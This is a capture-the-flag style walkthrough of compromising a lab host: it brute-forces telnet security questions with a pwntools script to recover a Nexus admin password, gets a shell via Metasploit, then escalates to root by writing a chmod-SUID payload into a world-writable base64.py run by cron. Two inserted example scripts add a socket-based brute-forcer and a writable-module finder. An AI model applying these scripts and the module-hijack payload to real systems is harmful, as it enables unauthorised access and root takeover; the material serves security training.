$ nmap -p- --min-rate 4000 -Pn 192.168.240.159
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 11:22 +08
Nmap scan report for 192.168.240.159
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
23/tcp open telnet
8081/tcp open blackice-icecap
Telnet Creds -> Nexus RCE
Port 8081 was hosting a vulnerable version of Nexus Repository Manager.
This version has known RCE exploits, but every one of them needs valid credentials first.
Weak credentials like admin:admin or nexus:nexus didn't work. In this case, let's check out Telnet on port 23 instead.
$ nc -vn 192.168.240.159 23
(UNKNOWN) [192.168.240.159] 23 (telnet) open
====================
NEXUS BACKUP MANAGER
====================
ANSONE Answer question one
ANSTWO Answer question two
BACKUP Perform backup
EXIT Exit
HELP Show help
HINT Show hints
RECOVER Recover admin password
RESTORE Restore backup
The RECOVER option suggests the admin password can be recovered from this service. Let's interact with the application a bit:
HINT
1.What is your zodiac sign?
2.What is your favorite color?
RECOVER
Please Enter Password
RECOVER <password>
ANSONE
Please Enter Answer
ANSONE <answer>
I wasn't sure how to get this, so let's use the ANSONE and ANSTWO options to check our options. I made a list of colours and zodiac signs:
capricorn
aquarius
aries
libra
scorpio
virgo
taurus
pisces
gemini
leo
cancer
sagittarius
Afterwards, we can create a Python script to brute force out the answer based on this:

```python
from pwn import *

def interact(word):
    r = remote('192.168.240.159', 23)
    for i in range(11):          # skip the 11-line menu banner
        r.recvline()
    r.sendline(b'ANSONE')
    r.recvline()                 # 'Please Enter Answer'
    r.recvline()                 # 'ANSONE <answer>'
    r.sendline(word.encode())
    response = r.recvline()
    if b'Incorrect' in response:
        r.close()
    else:
        log.info("Correct!")
        log.info(f"Password is {word}")
        r.close()

def main():
    with open('colours.txt', 'r') as file:
        for line in file:
            interact(line.strip())   # drop the trailing newline before sending

main()
```
This would slowly brute force the first answer, which is black:
$ python3 brute.py
<TRUNCATED>
[+] Opening connection to 192.168.240.159 on port 23: Done
[*] Correct!
[*] Password is black
[*] Closed connection to 192.168.240.159 port 23
Now we can do the same for the zodiac signs and ANSTWO.
[+] Opening connection to 192.168.240.159 on port 23: Done
[*] Correct!
[*] Password is leo
[*] Closed connection to 192.168.240.159 port 23
So the correct answers are 'black' and 'leo'. We can create a wordlist with these words, which is just:
black
leo
leoblack
blackleo
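The two brute-force runs above and the wordlist built from their answers, as one added example that is not the writeup's script: it drives the prompt with plain sockets instead of pwntools, opens a fresh connection per guess (as the original does), strips wordlist newlines, treats a hang-up as a failed guess, and then generates the RECOVER candidates from however many answers were recovered. The mock server at the bottom is a constructed stand-in for 192.168.240.159:23 that only models the prompts quoted above (the 11-line menu, 'Please Enter Answer', 'Incorrect'); anything else about the real service's responses is an assumption.

```python
# Added example, not the original writeup's script: drive the NEXUS BACKUP
# MANAGER prompt with plain sockets, brute-force ANSONE/ANSTWO, then build the
# RECOVER candidates from the answers.  The mock server at the bottom is a
# constructed stand-in for 192.168.240.159:23 that only models the prompts
# quoted in the writeup (11-line menu, 'Please Enter Answer', 'Incorrect');
# the real service's exact responses beyond those are an assumption.
import socket
import threading
from itertools import permutations

MENU = (
    b"====================\nNEXUS BACKUP MANAGER\n====================\n"
    b"ANSONE Answer question one\nANSTWO Answer question two\n"
    b"BACKUP Perform backup\nEXIT Exit\nHELP Show help\nHINT Show hints\n"
    b"RECOVER Recover admin password\nRESTORE Restore backup\n"
)
MENU_LINES = MENU.count(b"\n")  # 11, the recvline() count in the pwntools script


def readline(sock):
    """Read one newline-terminated line; b'' means the peer closed."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return bytes(buf)


def try_answer(host, port, command, guess, timeout=5):
    """Fresh connection per guess (as in the writeup); True if the answer is accepted."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            for _ in range(MENU_LINES):
                readline(s)
            s.sendall(command + b"\n")
            readline(s)  # 'Please Enter Answer'
            readline(s)  # 'ANSONE <answer>' usage line
            s.sendall(guess.encode() + b"\n")
            reply = readline(s)
            # an empty reply means the service hung up, which is not a success
            return bool(reply) and b"Incorrect" not in reply
    except OSError:
        return False  # reset, timeout or refused: treat as not accepted


def brute_force(host, port, command, wordlist):
    """First word the service accepts for command (b'ANSONE' / b'ANSTWO'), else None."""
    for word in wordlist:
        word = word.strip()  # a wordlist line still carries its '\n'
        if word and try_answer(host, port, command, word):
            return word
    return None


def candidate_passwords(answers):
    """Each answer alone plus every ordered concatenation: black, leo, blackleo, leoblack."""
    cands = list(answers)
    for r in range(2, len(answers) + 1):
        cands.extend("".join(p) for p in permutations(answers, r))
    return cands


# ---- constructed mock of the telnet service, so this runs offline ----
MOCK_ANSWERS = {b"ANSONE": b"black", b"ANSTWO": b"leo"}


def _serve_one(conn):
    with conn:
        conn.sendall(MENU)
        cmd = readline(conn).strip()
        if cmd in MOCK_ANSWERS:
            conn.sendall(b"Please Enter Answer\n" + cmd + b" <answer>\n")
            ok = readline(conn).strip() == MOCK_ANSWERS[cmd]
            conn.sendall(b"Correct\n" if ok else b"Incorrect\n")


def start_mock_server():
    """Listen on 127.0.0.1 on a free port and return that port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_mock_server()
    one = brute_force("127.0.0.1", port, b"ANSONE", ["red\n", "blue\n", "black\n"])
    two = brute_force("127.0.0.1", port, b"ANSTWO", ["aries\n", "leo\n"])
    print(one, two, candidate_passwords([one, two]))
```

Against the real host, replace the mock port with 23 and feed brute_force the colours and zodiac files; candidate_passwords then gives the four RECOVER guesses, of which blackleo is the one that worked above.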
blackleo is the correct password:
RECOVER
Please Enter Password
RECOVER <password>
blackleo
3e409e89-514c-4f9f-955e-dfa5c4083518
Using this, we can run the exploit with these parameters:
I had a lot of trouble getting a shell on this machine for some reason. Eventually, I just decided to use msfconsole to exploit this.
Privilege Escalation
Cronjob -> Python Module Hijack
I ran a linpeas.sh scan on the machine and found an interesting permission set:
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
<TRUNCATED>
/usr/lib/python3.8
/usr/lib/python3.8/base64.py
We can write to base64.py, which is the module being used here. I ran pspy64 as well to see if this file was being executed in any way.
The file was also owned by root, meaning that this was likely being generated by the logcrypt cronjob. I just echoed import os;os.system("chmod u+s /bin/bash") into the base64.py file and it worked!
nexus@sona:/usr/lib/python3.8$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
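The check behind this privilege escalation, as an added example that is not part of the writeup: given the script a privileged cron job runs, list every module it imports whose source file is writable (the /usr/lib/python3.8/base64.py case above), whose directory is writable, or which a writable directory earlier on the import path could shadow. The fixture it builds (logcrypt.py importing a hypothetical logcrypt_helper module) is constructed in a temp dir; those names are not from the target.

```python
# Added example, not code from the original writeup: list the modules a script
# imports whose source file, directory or an earlier search-path directory is
# writable by the current user, i.e. the condition abused above, where a root
# cron job imported a world-writable /usr/lib/python3.8/base64.py.  The
# fixture from build_demo_tree() (logcrypt.py, logcrypt_helper.py) is
# constructed in a temp dir; those names are not from the target.
import ast
import atexit
import os
import shutil
import tempfile
from importlib.machinery import PathFinder


def imported_names(script_path):
    """Top-level module names from every 'import x' / 'from x import y' in the file."""
    with open(script_path, "rb") as f:
        tree = ast.parse(f.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_imports(script_path, search_path):
    """Return [(module, file, reason)] for imports the current user could tamper
    with when a more privileged account runs script_path with this search path."""
    hits = []
    for name in imported_names(script_path):
        spec = PathFinder.find_spec(name, search_path)
        if spec is None or not spec.origin or not spec.origin.endswith(".py"):
            continue  # built-in, C extension, namespace package or not found
        path = os.path.abspath(spec.origin)
        mod_dir = os.path.dirname(path)
        # the search-path entry the module really loads from (package -> its parent)
        entry = os.path.dirname(mod_dir) if os.path.basename(path) == "__init__.py" else mod_dir
        if os.access(path, os.W_OK):
            hits.append((name, path, "file writable"))
        elif os.access(mod_dir, os.W_OK):
            hits.append((name, path, "directory writable"))
        else:
            for d in search_path:
                if os.path.abspath(d) == entry:
                    break  # nothing earlier on the path can shadow it
                if os.path.isdir(d) and os.access(d, os.W_OK):
                    hits.append((name, path, f"shadowable from {d}"))
                    break
    return hits


def build_demo_tree():
    """Constructed fixture: a 'cron' script importing os, base64 and a
    world-writable helper module in a read-only directory.
    Returns (script, search_path, helper_file)."""
    root = tempfile.mkdtemp(prefix="modhijack-")
    lib = os.path.join(root, "lib")
    os.mkdir(lib)
    helper = os.path.join(lib, "logcrypt_helper.py")
    with open(helper, "w") as f:
        f.write("KEY = 'demo'\n")
    os.chmod(helper, 0o666)  # world-writable, like base64.py on the target
    os.chmod(lib, 0o555)     # the directory itself is not writable (unless root)
    script = os.path.join(root, "logcrypt.py")
    with open(script, "w") as f:
        f.write("import os\nimport base64\nfrom logcrypt_helper import KEY\n")
    atexit.register(lambda: (os.chmod(lib, 0o755), shutil.rmtree(root, ignore_errors=True)))
    stdlib = os.path.dirname(os.__file__)
    return script, [lib, stdlib], helper


if __name__ == "__main__":
    script, path, _ = build_demo_tree()
    for name, file, reason in writable_imports(script, path):
        print(f"{name:16} {reason:20} {file}")
```

On a real target, pass the script pspy shows the cron job running and the sys.path of the interpreter it runs under (python3 -c 'import sys; print(sys.path)' as the same interpreter); on the box above, base64 would come back as "file writable", which is exactly the module the payload was appended to.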